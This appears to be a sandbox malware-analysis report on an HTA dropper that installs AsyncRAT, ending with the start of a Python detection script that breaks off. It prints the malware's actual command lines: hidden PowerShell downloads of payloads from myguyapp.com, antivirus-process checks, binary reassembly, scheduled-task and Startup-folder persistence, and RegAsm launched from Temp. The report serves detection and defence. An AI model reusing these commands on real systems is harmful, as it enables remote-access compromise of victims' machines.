              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004050CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01054830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_01054830
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_008A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,36_2_008A4830
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01054632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,28_2_01054632
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044A5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0106D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,28_2_0106D164
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_008BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,36_2_008BD164

              System Summary

              Source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile dump: msword.exe.12.dr 891289591Jump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044365: CreateFileW,_memset,DeviceIoControl,CloseHandle,28_2_01044365
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01038F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_01038F2E
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,15_2_00403883
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01045778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,28_2_01045778
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00895778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,36_2_00895778
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DistributionsPit
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\PrintersOngoing
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 01000D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 00FF1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 01008B30 appears 42 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 00850D17 appears 70 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 00841A36 appears 34 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 00858B30 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: String function: 004062A3 appears 58 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: String function: 00801F37 appears 49 times
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, JbeTyT6ozehDZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: classification engine | Classification label: mal100.troj.expl.evad.winHTA@70/82@4/1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104A6AD GetLastError,FormatMessageW
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01038DE9 AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01039399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00888DE9 AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00889399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01044148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004024FB CoCreateInstance
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
              Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c[1].bat
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
              Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Temp\temp.bat
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
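The process-creation chain listed above is the most reusable part of this report for detection: AV discovery via tasklist piped into a case-insensitive findstr for known security-product process names, reassembly of a renamed PE with copy /b, execution of a .pif from %TEMP%, a scheduled task that runs wscript //B every five minutes, a Startup-folder .url pointing at the dropped .js, and RegAsm.exe launched from a user-writable directory instead of the .NET Framework folder. The following is an added example, not part of the Joe Sandbox report, that runs simple rules over constructed Sysmon-style process events (parent image, image, command line) modelled on the report's lines; the event layout, rule names, the AV process-name list and the chain threshold are assumptions chosen for illustration.

```python
"""Rule-based detection of the staged execution chain seen in the c2.hta report.

Events are modelled on Sysmon Event ID 1 (ParentImage, Image, CommandLine).
The sample events below are constructed from the report's "Process created"
lines; they are not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # ParentImage
    image: str    # Image
    cmdline: str  # CommandLine


# Paths taken from the report, used to build the constructed sample events.
TEMP = r"C:\Users\user\AppData\Local\Temp\220239"
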